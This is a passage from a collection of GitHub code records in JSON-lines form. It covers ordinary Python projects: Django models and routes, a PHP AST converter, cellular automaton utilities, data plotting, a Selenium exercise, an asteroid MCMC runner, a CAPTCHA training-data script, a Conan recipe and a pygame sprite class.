file)\n\n for k, v in default_settings.items():\n # Make sure all default keys exists if\n # settings are migrated from older version\n if k not in cls.app:\n cls.app[k] = v\n\n cls.setup_lang()\n print('AppSettings successfully loaded from file.')\n\n @classmethod\n def save(cls) -> None:\n file = Path(cls.get_settings_path())\n\n if not file:\n LOGGER.warning('Could not save settings file! No setting will be saved.')\n return\n\n Settings.save(cls, file)\n\n @staticmethod\n def setup_lang():\n setup_translation(language=AppSettings.language)\n print('Application language loaded from settings: ', AppSettings.language)\n\n @classmethod\n def load_ui_resources(cls) -> bool:\n \"\"\" update app globals with GUI resource paths \"\"\"\n ui_paths_file = Path(UI_PATH) / Path(UI_PATHS_FILE)\n\n if not ui_paths_file.exists():\n LOGGER.fatal('Could not locate gui resource file: %s. Aborting application.',\n ui_paths_file.absolute().as_posix())\n return False\n\n try:\n Settings.load(Resource, ui_paths_file)\n except Exception as e:\n LOGGER.fatal('Could not load GUI resources from file %s. Aborting application. Error:\\n%s',\n ui_paths_file.absolute().as_posix(), e)\n return False\n return True\n\n @classmethod\n def add_recent_file(cls, file: Union[Path, str], file_type: str='', list_length: int=10) -> None:\n if 'recent_files' not in cls.app.keys():\n cls.app['recent_files'] = list()\n\n file_str = Path(file).as_posix()\n recent_files = cls.app['recent_files']\n\n # Remove already existing/duplicate entry's\n for idx, entry in enumerate(recent_files):\n entry_file, entry_type = entry\n\n if file_str == entry_file and file_type == entry_type:\n recent_files.pop(idx)\n\n recent_files.insert(0, (file_str, file_type))\n\n # Only keep the last [list_length] number of items\n if len(recent_files) > list_length:\n recent_files = recent_files[:list_length]\n\n @staticmethod\n def get_settings_path() -> str:\n _knecht_settings_dir = get_settings_dir()\n _knecht_settings_file = os.path.join(_knecht_settings_dir, SETTINGS_FILE)\n\n return _knecht_settings_file\n","repo_name":"tappi287/tieflader","sub_path":"modules/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"42967346259","text":"from django.db import models\n\n# Create your models here.\n\n\ndef custom_upload_to(instance, filename):\n if instance.pk:\n try:\n old_instance = AboutMePerfil.objects.get(pk=instance.pk)\n old_instance.image.delete()\n print(old_instance.image)\n\n except AboutMePerfil.DoesNotExist as e:\n print(f\"MENSAJE DE ERRO--------{e}\")\n\n return 'perfilImg/' + filename\n\n\nclass AboutMePerfil(models.Model):\n\n title = models.CharField(max_length=100, verbose_name=\"Titulo\")\n description = models.TextField(verbose_name=\"Descripcion\")\n image = models.ImageField(verbose_name=\"Portada\",\n upload_to=custom_upload_to)\n created = models.DateTimeField(\n auto_now_add=True, verbose_name=\"Fechade creacion\")\n update = models.DateTimeField(\n auto_now=True, verbose_name=\"fecha de actualizacion\")\n\n class Meta:\n verbose_name = \"Perfil\"\n ordering = [\"-created\"]\n\n def __str__(self) -> str:\n return self.title\n","repo_name":"hernan1030/web_personal-django","sub_path":"portafolio/webportfolio/aboutme/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"69865070766","text":"#!/usr/bin/env python\n\n# php2json.py - Converts PHP to a JSON-based abstract syntax tree\n# Usage: php2json.py < input.php > output.json\n\nimport sys\nfrom phply.phplex import lexer\nfrom phply.phpparse import make_parser\nimport json\n\ninput = sys.stdin\noutput = sys.stdout\nwith_lineno = True\n\ndef export(items):\n result = []\n if items:\n for item in items:\n if hasattr(item, 'generic'):\n item = item.generic(with_lineno=with_lineno)\n result.append(item)\n return result\ndef php2json(input_file, output_file):\n parser = make_parser()\n json.dump(export(parser.parse(input_file,\n lexer=lexer,\n tracking=with_lineno)),\n output_file, indent=2)\n output_file.write('\\n')\n","repo_name":"Jlan45/AnswerPHP","sub_path":"php2json.py","file_name":"php2json.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"2"} +{"seq_id":"18368514734","text":"import numpy as np\nfrom scipy.stats import entropy\nfrom sklearn.preprocessing import minmax_scale\n\n\ndef number_to_base(n: int, *, base: int, width: int) -> np.array:\n \"\"\"\n Convert a number into it's representation in argument weight and\n fixed width\n\n Args:\n n (int): Number to convert\n base (int): Base to represent number in\n width (int): Width of presentation (padding with 0s)\n\n Returns:\n np.array: Array of digits\n \"\"\"\n if n > (base**width) - 1:\n raise ValueError(\n (\n f\"{n} is outside the allotted width {width} \"\n \"of the representation in base {base}\"\n )\n )\n ret = np.zeros(width).astype(\"int\")\n idx = 0\n while n:\n ret[idx] = int(n % base)\n n //= base\n idx += 1\n return ret\n\n\ndef base_to_number(n, *, base):\n \"\"\"Convert number in base array back to an integer value\"\"\"\n return np.sum(n * (base ** np.arange(len(n))))\n\n\ndef rule_arr(n, idxs=None, perbs=None):\n \"\"\"\n Generate an array representing a ca-rule with possible deviations from that\n rule to create probabilistic update rules\n\n Args:\n n (int): Rule number to use as a base rule\n idxs (list): List of indices to apply perturbations\n perbs (list): List of perturbations corresponding to the indices list\n\n Returns:\n np.array: 2-D array representing the CA rule\n \"\"\"\n idxs = idxs or ()\n perbs = perbs or ()\n\n assert len(idxs) == len(\n perbs\n ), \"Index and perturbation lists must be the same length\"\n\n r = number_to_base(n, base=2, width=8).astype(\"float\")\n\n for j, k in zip(idxs, perbs):\n r[j] = r[j] - k if r[j] > 0 else r[j] + k\n\n rp = np.zeros((8, 2))\n rp[:, 1] = r\n rp[:, 0] = 1 - rp[:, 1]\n\n return rp\n\n\ndef joint_probability_map(r_array):\n \"\"\"\n Convert a rule array into conditional mapping from rules for joint\n probabilities\n\n Args:\n r_array (np.array): Update rule array to be converted\n\n Returns:\n np.array: 3d array representing the conditional update rules\n \"\"\"\n n_states = r_array.shape[1]\n ret = np.zeros((n_states, n_states, n_states**4, 5))\n\n for i in range(0, n_states**2):\n\n k = number_to_base(i, base=n_states, width=2)\n\n for j in range(n_states**4):\n nb = number_to_base(j, base=n_states, width=4)\n a = base_to_number(nb[:3], base=n_states)\n b = base_to_number(nb[1:], base=n_states)\n ret[k[0], k[1], j, :4] = nb\n ret[k[0], k[1], j, 4] = r_array[a][k[0]] * r_array[b][k[1]]\n\n return ret\n\n\ndef model_runner(rule: np.array, steps: int, initial_state: np.array):\n \"\"\"\n Run the model for the argument initial state, update rule and number of\n steps. Currently only supports 2 states.\n\n Args:\n rule (np.array): Update rule array\n steps (int): Number of steps to run the model for\n initial_state (np.array): Initial state represented as a 1d array\n\n Returns:\n np.array: 4d array of joint probability distributions\n \"\"\"\n # Create rule mapping\n rule_map = joint_probability_map(rule)\n\n # Width of the array\n width = len(initial_state)\n\n # TODO: Extend to more than 2 states\n n_states = 2\n\n # Initial State\n s0 = np.array(initial_state)\n\n # Vector p(i)\n p0 = np.zeros((width, n_states), dtype=\"float64\")\n\n # Initialize probabilities from the initial state\n for i, j in enumerate(s0):\n p0[i, 1] = j\n p0[i, 0] = 1 - j\n\n # Shift probabilities array to the right\n shift_p0 = p0.take(np.arange(1, width + 1), mode=\"wrap\", axis=0)\n\n # Initialize empty joint probability array with steps and width\n joint = np.zeros((steps, width, n_states, n_states), dtype=\"float64\")\n\n # And then get the joint (independent) probabilities\n joint[0, :, 0, 0] = p0[:, 0] * shift_p0[:, 0]\n joint[0, :, 1, 0] = p0[:, 1] * shift_p0[:, 0]\n joint[0, :, 0, 1] = p0[:, 0] * shift_p0[:, 1]\n joint[0, :, 1, 1] = p0[:, 1] * shift_p0[:, 1]\n\n # Update function called each step\n def update(x, y, l_arr, c_arr, r_arr, p_arr0, p_arr1):\n r_map = rule_map[x][y][:, :4].astype(\"int\")\n r_prob = rule_map[x][y][:, 4:]\n den = [p_arr0[:, r[1]] * p_arr1[:, r[2]] for r in r_map]\n num = [\n l_arr[:, r[0], r[1]] * c_arr[:, r[1], r[2]] * r_arr[:, r[2], r[3]]\n for r in r_map\n ]\n slices = [\n np.divide(n, d, out=np.zeros_like(n), where=d != 0)\n for n, d in zip(num, den)\n ]\n slices = np.multiply(r_prob, slices)\n return np.stack(slices).sum(axis=0)\n\n # Update each row in turn from previous row\n for i in range(1, joint.shape[0]):\n joint_t = joint[i - 1]\n\n # Left and right shifts\n shift_lt = joint_t.take(np.arange(-1, width - 1), mode=\"wrap\", axis=0)\n shift_rt = joint_t.take(np.arange(1, width + 1), mode=\"wrap\", axis=0)\n\n # Per-site marginal probabilities\n probs = joint_t.sum(axis=2)\n\n # Shifted marginals\n probs_r = probs.take(np.arange(1, width + 1), mode=\"wrap\", axis=0)\n\n # Update each of the joint probabilities\n joint[i, :, 0, 0] = update(0, 0, shift_lt, joint_t, shift_rt, probs, probs_r)\n joint[i, :, 1, 0] = update(1, 0, shift_lt, joint_t, shift_rt, probs, probs_r)\n joint[i, :, 0, 1] = update(0, 1, shift_lt, joint_t, shift_rt, probs, probs_r)\n joint[i, :, 1, 1] = update(1, 1, shift_lt, joint_t, shift_rt, probs, probs_r)\n\n return joint\n\n\ndef mutual_info(arr):\n \"\"\"\n Calculate the mutual information of a joint probability array\n\n Args:\n arr (np.array): 4d joint probability array\n\n Returns:\n np.array: 2d mutual information array\n \"\"\"\n p0 = np.sum(arr, axis=3)\n p1 = np.sum(arr, axis=2)\n\n def sub_mut(i, j):\n m = p0[:, :, i] * p1[:, :, j]\n d = np.log(m, out=np.zeros_like(m), where=m != 0)\n log = np.log(\n arr[:, :, i, j],\n out=np.zeros_like(arr[:, :, i, j]),\n where=arr[:, :, i, j] != 0,\n )\n return np.multiply(arr[:, :, i, j], log - d)\n\n m00 = sub_mut(0, 0)\n m10 = sub_mut(1, 0)\n m01 = sub_mut(0, 1)\n m11 = sub_mut(1, 1)\n\n return m00 + m10 + m01 + m11\n\n\ndef flat_joint_entropy(arr):\n \"\"\"\n Calculate the entropy of the flattened joint probability array\n\n Args:\n arr (np.array): 4d joint probability array\n\n Returns:\n np.array: 2d mutual information array\n \"\"\"\n return entropy(arr.reshape(arr.shape[0], arr.shape[1], -1), axis=2)\n\n\ndef min_max_scale_rows(arr):\n \"\"\"Min-scale across rows of a 2-d array\"\"\"\n return minmax_scale(arr, axis=1)\n\n\ndef checks(joint_prob_arr):\n \"\"\"\n Checks that the model is correctly producing probability distributions\n \"\"\"\n\n # Check that marginal probabilities are the same when\n # summed from left-to-right or right-to-left\n last_row = joint_prob_arr[-1]\n assert np.isclose(\n last_row.sum(axis=1),\n last_row.sum(axis=2).take(\n np.arange(1, last_row.shape[0] + 1), mode=\"wrap\", axis=0\n ),\n ).all()\n\n np.isclose(\n 1, np.sum(joint_prob_arr) / (joint_prob_arr.shape[0] * joint_prob_arr.shape[1])\n )\n\n print(\"Ok\")\n","repo_name":"zombie-einstein/probabilistic_ca","sub_path":"deprecated/ca_utils.py","file_name":"ca_utils.py","file_ext":"py","file_size_in_byte":7303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"32552825473","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('balanceInquiry', views.balanceInquiry, name='balanceInquiry'),\n path('creditCardInquiry', views.creditCardInquiry, name='creditCardInquiry'),\n path('lastTransaction', views.lastTransaction, name='lastTransaction'),\n path('sendMoney', views.sendMoney, name='sendMoney')\n]","repo_name":"SaqibHasan057/Banking_Chatbot","sub_path":"bank/localDatabase/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12568097325","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# load in csv file\nfacilities = pd.read_csv(\"../../Data/Unprocessed/facilities.csv\")\n\n# show\nfacilities.head(5)\n# create list of facility columns\nfacil_col = ['ticket_vending_machine', 'luggage_lockers', 'free_parking', 'taxi', 'bicycle_spots', 'blue-bike',\n 'bus', 'tram', 'metro', 'wheelchair_available', 'ramp', 'disabled_parking_spots', 'elevated_platform',\n 'escalator_up', 'escalator_down', 'elevator_platform', 'audio_induction_loop']\n\n# check frequency of each variable\nfacilities[\"disabled_parking_spots\"].value_counts()\n\n# for the sake of this exercise, we will simply impute all missing values of the facilities with zero\nfor col in facil_col:\n facilities[col].fillna((0), inplace=True)\n\n# check if it worked\nfor col in facilities.columns:\n missings = len(facilities[col][facilities[col].isnull()]) / float(len(facilities))\n print(col, missings)\n\n# PROBLEM: disabled_parking_spots is the number of spots instead of a dummy indicator\n# so let's create a dummy variable\nfacilities['disabled_parking_spots_indicator'] = np.where(facilities['disabled_parking_spots']==0,0,1)\n\n# drop old variable and add new name to our list\nfacil_col.remove('disabled_parking_spots')\nfacil_col = facil_col + ['disabled_parking_spots_indicator']\n\n# show\nfacil_col\n\n\n# compute total number of facilities per station\nfacilities['number_facilities'] = facilities[facil_col].sum(axis = 1)\n\n# show\nfacilities['number_facilities']\n# prepare data for number of facilities in different stations\ninput_plot = pd.DataFrame(facilities['number_facilities'].value_counts())\n# show\ninput_plot\n# prepare dataset as input for pyplot because we want two columns to make a plot\ninput_plot['NumberFacilities'] = input_plot.index\ninput_plot = input_plot.rename(index=str, columns={'number_facilities': 'Occurence'})\n\n# show\ninput_plot\n# time to get plotting\nfig, ax = plt.subplots()\nplt.bar(input_plot['NumberFacilities'], input_plot['Occurence'])\nplt.locator_params(axis='x', nbins=len(input_plot))\nplt.xlabel('Number of facilities offered at the station')\nplt.ylabel('Number stations offering this amount of facilities')\nplt.show()\n\n# import packages\nimport geopandas as gpd\n# read in file in geopandas data structure\nmap_df = gpd.read_file('../Data/BELGIUM_-_Provinces/BELGIUM_-_Provinces.shp')\n\n#show\nmap_df.head()\n# show\nmap_df.plot()\n# check unique province names in map_df\nmap_df[\"NE_Name\"].unique()\n# load self created excel file regarding inhabitant data (source: statbel)\ninh_df = pd.read_excel('../data/inhabitants_prov.xlsx')\n# show\ninh_df.head()\n# change column to the same name and then merge both tables\ninh_df = inh_df.rename(index=str, columns={'Province': 'NE_Name'})\n\n# merge\nmap_df = map_df.merge(inh_df, on='NE_Name')\n\n# show\nmap_df.head()\n# create figure and axes for Matplotlib\nfig, ax = plt.subplots(1, figsize=(10, 6))\n\n# use cmap = 'BuGn' to get nice color-shaded plot\nmap_df.plot(column='Inhabitants', cmap='BuGn', linewidth=0.8, ax=ax)\n# dictionary with location of Belgian universities\ndata = {'Name': ['Ugent', 'KULeuven', 'VUB'],\n 'lat': [51.046672, 50.877833, 50.822476],\n 'lon': [3.727708, 4.700250, 4.394807]}\n\n# create data frame\ndata_df = pd.DataFrame(data, columns = ['Name', 'lat', 'lon'])\n\n# plot\ndata_df.plot('lon', 'lat', 'scatter', color='red')\n# overlap with our map\nax = data_df.plot('lon', 'lat', 'scatter', color='red', zorder=2)\nmap_df.plot(column='Inhabitants', cmap='BuGn', linewidth=0.8, ax = ax, zorder = 1)\n\n","repo_name":"Seoyangsam/ACRM","sub_path":"src/bin_unused_files/GetYouStartedPt3.py","file_name":"GetYouStartedPt3.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12793575908","text":"# https://stepik.org/lesson/715854/step/7?unit=716645\n\n# ЗАДАЧА\n# Откройте сайт=https://parsinger.ru/methods/3/index.html с помощью Selenium;\n# Ваша задача получить все значения cookie с чётным числом после \"_\" и суммировать их;\n# Полученный результат вставить в поле для ответа.\nfrom pprint import pprint\nimport time\nfrom selenium import webdriver\n\nwith webdriver.Chrome() as webdriver:\n webdriver.get('https://parsinger.ru/methods/3/index.html')\n cookies = webdriver.get_cookies()\n res = 0\n for cookie in cookies:\n if int(cookie['name'][-1]) % 2 == 0:\n res += int(cookie['value'])\n print(res)\n time.sleep(10)\n# >1962101\n","repo_name":"sprinter4646/WEBparsing","sub_path":"5.5.7_ .zadacha .py","file_name":"5.5.7_ .zadacha .py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16447930146","text":"import argparse\nimport textwrap\n\nimport pandas as pd\nimport h5py\n\n# from plotting import plot_mcmc_sampling_results\nfrom asterogap.GP import GPFit\n\nimport os\n\n# TODO: is this still needed?\nos.environ[\"MKL_NUM_THREADS\"] = \"3\"\n\n\ndef read_data(filename, datadir=\"./\", cols=None, whitespace=False):\n \"\"\"\n Read in light curve data from asteroid.\n \"\"\"\n\n if cols is None:\n header = None\n cols = [0, 1, 2]\n\n else:\n header = 0\n\n data = pd.read_csv(datadir + filename, delim_whitespace=whitespace, header=header)\n\n print(\"columns = \" + str(cols))\n\n tsample = data[cols[0]]\n fsample = data[cols[1]]\n flux_err = data[cols[2]]\n\n return tsample, fsample, flux_err\n\n\ndef write_data(filename, sampler, asteroid, nwalkers, niter, burn_in):\n \"\"\"\n Write the sampler results as an HDF5 file,\n with all the other info you might want.\n \"\"\"\n\n # create a new filename ending\n filename_new = filename.replace(filename.split(\".\")[-1], \"hdf5\")\n\n with h5py.File(filename_new, \"w\") as f:\n f.create_dataset(\"chain\", data=sampler.chain)\n\n f.attrs[\"walkers\"] = nwalkers\n f.attrs[\"iterations\"] = niter\n f.attrs[\"data_pts\"] = asteroid.data_pts\n f.attrs[\"acceptance_fraction\"] = sampler.acceptance_fraction\n f.attrs[\"burn_in\"] = burn_in\n f.create_dataset(\"time\", data=asteroid.time)\n f.create_dataset(\"flux\", data=asteroid.flux)\n f.create_dataset(\"flux_err\", data=asteroid.flux_err)\n\n\ndef main():\n # read in the data file\n print(\"\\nreading in data\")\n time, flux, flux_err = read_data(filename, datadir, cols, whitespace)\n\n if kernel_long:\n print(\"\\nincluding long-term kernel\\nit's log unif!\")\n asteroid = GPFit(time, flux, flux_err, kernel_long)\n\n print(\"\\nsetting kernel\")\n asteroid.set_params()\n asteroid.set_walker_param_matrix(nwalkers)\n asteroid.set_gp_kernel()\n\n print(\"\\nrunning mcmc\")\n sampler = asteroid.run_emcee(\n niter=niter, nwalkers=nwalkers, burn_in=burn_in, threads=threads\n )\n\n print(\"\\nwriting out results\")\n write_data(filename, sampler, asteroid, nwalkers, niter, burn_in)\n\n return\n\n\nif __name__ == \"__main__\":\n # DEFINE PARSER FOR COMMAND LINE ARGUMENTS\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\" \", # Bayesian QPO searches for burst light curves.\",\n epilog=textwrap.dedent(\n \"\"\"\n\n NOTE! The first 3 columns of your input file \"-f\" must correspond to your\n time, flux, and flux error in that order. All columns beyond column 3 will be ignored.\n\n Examples\n --------\n\n Print this help message:\n\n $> python run_gp.py --help\n\n Run this script from anywhere on your system:\n\n $> python /absolute/path/to/asterogap/run_gp.py --help\n\n\n # Run on example data in the data directory:\n #\n # $> python /absolute/path/to/asterogap/run_gp.py -f \"2001SC170.csv\"\n # -d \"absolute/path/to/CometGP/data/asteroid_csv\"\n\n Run on example data (from example data directory) with more walkers, steps, etc.\n\n $> python ../code/run_gp.py -f \"2001SC170.csv\" -d \"./\" -w 50 -i 5000 -t 2\n\n\n \"\"\"\n ),\n )\n\n parser.add_argument(\n \"-f\",\n \"--filename\",\n action=\"store\",\n dest=\"filename\",\n required=True,\n help=\"Data file with observed time (in unit days) and flux.\",\n )\n parser.add_argument(\n \"-d\",\n \"--datadir\",\n action=\"store\",\n dest=\"datadir\",\n required=False,\n default=\"./\",\n help=\"Directory with the data (default: current directory).\",\n )\n parser.add_argument(\n \"-w\",\n \"--nwalkers\",\n action=\"store\",\n dest=\"nwalkers\",\n required=False,\n type=int,\n default=100,\n help=\"The number of walkers/chains for the MCMC run (default: 100).\",\n )\n parser.add_argument(\n \"-i\",\n \"--niter\",\n action=\"store\",\n dest=\"niter\",\n required=False,\n type=int,\n default=1000,\n help=\"The number of iterations per chain/walker in the MCMC run (default: 1000).\",\n )\n parser.add_argument(\n \"-t\",\n \"--threads\",\n action=\"store\",\n dest=\"threads\",\n required=False,\n type=int,\n default=1,\n help=\"The number of threads used for computing the posterior (default: 1).\",\n )\n\n parser.add_argument(\n \"-ws\",\n \"--whitespace\",\n action=\"store_true\",\n dest=\"whitespace\",\n required=False,\n default=False,\n help=\"The delimeter for the input file, assumed not to be whitespace.\",\n )\n\n parser.add_argument(\n \"-b\",\n \"--burn_in\",\n action=\"store\",\n dest=\"burn_in\",\n required=False,\n type=int,\n default=2000,\n help=\"The number of iterations to remove from the head of the MCMC chain walkers.\",\n )\n parser.add_argument(\n \"-k\",\n \"--kernel\",\n action=\"store_false\",\n dest=\"kernel\",\n required=False,\n default=True,\n help=\"Include a long-term lightcurve profile adjustment kernel.\",\n )\n parser.add_argument(\n \"-c\",\n \"--columns\",\n nargs=3,\n type=str,\n action=\"store\",\n dest=\"columns\",\n required=False,\n help=\"Specify which column names to use to extract time, flux, and flux error. Must be a string.\",\n )\n\n clargs = parser.parse_args()\n\n filename = clargs.filename\n datadir = clargs.datadir\n nwalkers = clargs.nwalkers\n niter = clargs.niter\n threads = clargs.threads\n whitespace = clargs.whitespace\n burn_in = clargs.burn_in\n kernel_long = clargs.kernel\n cols = clargs.columns\n\n main()\n","repo_name":"dirac-institute/asterogap","sub_path":"asterogap/run_gp.py","file_name":"run_gp.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"14004183509","text":"import cv2\nimport numpy as np\nimport os\nimport time as tm\n\nalpha = {'A': 0, 'B': 0, 'C': 0, 'D': 0, 'E': 0, 'F': 0, 'G': 0, 'H': 0, 'I': 0, 'J': 0, 'K': 0, 'L': 0, 'M': 0, 'N': 0, 'O': 0, 'P': 0, 'Q': 0, 'R': 0, 'S': 0, 'T': 0, 'U': 0, 'V': 0, 'W': 0, 'X': 0,'Y': 0, 'Z': 0}\n\ndef get_count(img, filename):\n width = 20\n height = 20\n dim = (width, height)\n\n proj = np.sum(img, axis=0)\n proj = np.clip(proj, 0, 255)\n\n new_proj = [proj[i]-proj[i+1] for i in range(len(proj)-1)]\n new_proj = np.array(new_proj).nonzero()[0]\n\n for i in range(0,len(new_proj),2):\n resized = cv2.resize(img[:, new_proj[i]:new_proj[i+1]], dim, interpolation = cv2.INTER_AREA)\n name = filename[i//2]\n path = \"./Train_data/\"+name+\"/\"+str(alpha[name])+\".png\"\n alpha[name] += 1\n cv2.imwrite(path, resized)\n\n return len(new_proj)/2\n\n\nif __name__ == \"__main__\":\n\n folder_path = \"../train/\"\n file_names = os.listdir(folder_path)\n \n dilatation_size = 1\n dilatation_type = 0\n element = cv2.getStructuringElement(dilatation_type, (2 * dilatation_size + 1, 2 * dilatation_size + 1),\n (dilatation_size, dilatation_size))\n \n # i = 0\n tic = tm.perf_counter()\n for file_name in file_names:\n\n img_rgb = cv2.imread(folder_path+file_name)\n img_hsv = cv2.cvtColor(img_rgb, cv2.COLOR_RGB2HSV)\n\n h, s, v = cv2.split(img_hsv)\n\n _, s_thr = cv2.threshold(s, 100, 255, cv2.THRESH_BINARY)\n\n img = np.bitwise_and(s_thr, v)\n non_zeros = img.nonzero()\n img_nz = img[non_zeros]\n avg = np.average(img_nz)\n\n _, pre_final = cv2.threshold(img, avg, 255, cv2.THRESH_BINARY)\n\n final = cv2.erode(pre_final, element)\n \n char_count = get_count(final, file_name.split(\".\")[0])\n\n if char_count != len(file_name.split(\".\")[0]):\n print(\"----------------------\" + file_name + \"----------------------\")\n\n # i += 1\n # print(\"Image \" + str(i) + \" done!!!\")\n\n toc = tm.perf_counter()\n print(\"Time for storing Training Images = \" + str(toc-tic) + \"\\n\")\n","repo_name":"Nirav0312/courseProjects","sub_path":"DeCAPTCHA/genTrain.py","file_name":"genTrain.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"2673292700","text":"from conans import ConanFile, CMake, tools\nimport os\nimport textwrap\n\nrequired_conan_version = \">=1.43.0\"\n\n\nclass AmqpcppConan(ConanFile):\n name = \"amqp-cpp\"\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/CopernicaMarketingSoftware/AMQP-CPP\"\n topics = (\"amqp\", \"network\", \"queue\")\n license = \"Apache-2.0\"\n description = \"C++ library for asynchronous non-blocking communication with RabbitMQ\"\n\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"linux_tcp_module\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n \"linux_tcp_module\": True,\n }\n\n generators = \"cmake\"\n _cmake = None\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n @property\n def _build_subfolder(self):\n return \"build_subfolder\"\n\n def export_sources(self):\n self.copy(\"CMakeLists.txt\")\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n self.copy(patch[\"patch_file\"])\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n del self.options.linux_tcp_module\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n\n def requirements(self):\n if self.options.get_safe(\"linux_tcp_module\"):\n self.requires(\"openssl/1.1.1q\")\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version],\n destination=self._source_subfolder, strip_root=True)\n\n def _configure_cmake(self):\n if self._cmake:\n return self._cmake\n self._cmake = CMake(self)\n self._cmake.definitions[\"AMQP-CPP_BUILD_SHARED\"] = self.options.shared\n self._cmake.definitions[\"AMQP-CPP_BUILD_EXAMPLES\"] = False\n self._cmake.definitions[\"AMQP-CPP_LINUX_TCP\"] = self.options.get_safe(\"linux_tcp_module\") or False\n self._cmake.configure(build_folder=self._build_subfolder)\n return self._cmake\n\n def _patch_sources(self):\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n tools.patch(**patch)\n\n def build(self):\n self._patch_sources()\n cmake = self._configure_cmake()\n cmake.install()\n\n def package(self):\n cmake = self._configure_cmake()\n cmake.install()\n self.copy(\"LICENSE\", src=self._source_subfolder, dst=\"licenses\", keep_path=False)\n tools.rmdir(os.path.join(self.package_folder, \"cmake\"))\n tools.rmdir(os.path.join(self.package_folder, \"lib\", \"pkgconfig\"))\n\n # TODO: to remove in conan v2 once cmake_find_package* generators removed\n self._create_cmake_module_alias_targets(\n os.path.join(self.package_folder, self._module_file_rel_path),\n {\"amqpcpp\": \"amqpcpp::amqpcpp\"}\n )\n\n @staticmethod\n def _create_cmake_module_alias_targets(module_file, targets):\n content = \"\"\n for alias, aliased in targets.items():\n content += textwrap.dedent(\"\"\"\\\n if(TARGET {aliased} AND NOT TARGET {alias})\n add_library({alias} INTERFACE IMPORTED)\n set_property(TARGET {alias} PROPERTY INTERFACE_LINK_LIBRARIES {aliased})\n endif()\n \"\"\".format(alias=alias, aliased=aliased))\n tools.save(module_file, content)\n\n @property\n def _module_file_rel_path(self):\n return os.path.join(\"lib\", \"cmake\", \"conan-official-{}-targets.cmake\".format(self.name))\n\n def package_info(self):\n self.cpp_info.set_property(\"cmake_file_name\", \"amqpcpp\")\n self.cpp_info.set_property(\"cmake_target_name\", \"amqpcpp\")\n self.cpp_info.set_property(\"pkg_config_name\", \"amqpcpp\")\n self.cpp_info.libs = [\"amqpcpp\"]\n if self.settings.os in [\"Linux\", \"FreeBSD\"]:\n self.cpp_info.system_libs = [\"dl\", \"pthread\"]\n\n # TODO: to remove in conan v2 once cmake_find_package* generators removed\n self.cpp_info.names[\"pkg_config\"] = \"amqpcpp\"\n self.cpp_info.names[\"cmake_find_package\"] = \"amqpcpp\"\n self.cpp_info.names[\"cmake_find_package_multi\"] = \"amqpcpp\"\n self.cpp_info.build_modules[\"cmake_find_package\"] = [self._module_file_rel_path]\n self.cpp_info.build_modules[\"cmake_find_package_multi\"] = [self._module_file_rel_path]\n","repo_name":"orgTestCodacy11KRepos110MB/repo-4943-conan-center-index","sub_path":"recipes/amqp-cpp/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70718070767","text":"# Mario class (for player)\n\nimport pygame, constants, sprite\n\nclass Mario(pygame.sprite.Sprite):\n\n def __init__(self):\n\n # parent constructor\n super().__init__()\n\n \"\"\" Init constants and variables \"\"\"\n # States for Mario \n self.standing = self.big = True\n self.walking = self.running = self.jumping = self.highJumping = self.falling = self.crouching = self.small = False\n self.direction = \"R\"\n\n # sprite arrays (big and small Mario)\n self.bigR_frames = []\n self.bigL_frames = []\n\n self.smallR_frames = []\n self.smallL_frames = []\n\n # frame constants (for big Mario)\n self.turnFrame = 4\n self.jumpFrame = 5\n self.crouchFrame = 6\n self.moveFrame = 3\n \n # frame vars for animation and timer\n self.frames = self.bigR_frames # current set of frames to be using\n self.curFrame = 0\n self.timer = 0\n\n \"\"\" Load images from sprite sheet\"\"\" \n\n # Big Mario\n\n # load sprite sheet\n self.sprite = pygame.image.load(\"bigMario_blue.png\").convert() # sprite is attribute of this class constructor\n\n # add to right frames with loop\n frameCount = 0\n while frameCount < 6: # load each standing sprite\n image = sprite.get_image(self, frameCount*16, 0, 16, 28, constants.GREEN)\n self.bigR_frames.append(image)\n frameCount += 1\n\n # load crouch sprite\n image = sprite.get_image(self, frameCount*16, 10, 16, 18, constants.GREEN)\n self.bigR_frames.append(image) \n\n # add to left (just flip frames of right)\n for frame in self.bigR_frames:\n temp = pygame.transform.flip(frame, True, False)\n self.bigL_frames.append(temp)\n \n # set starting sprite\n self.image = self.bigR_frames[self.curFrame]\n\n # 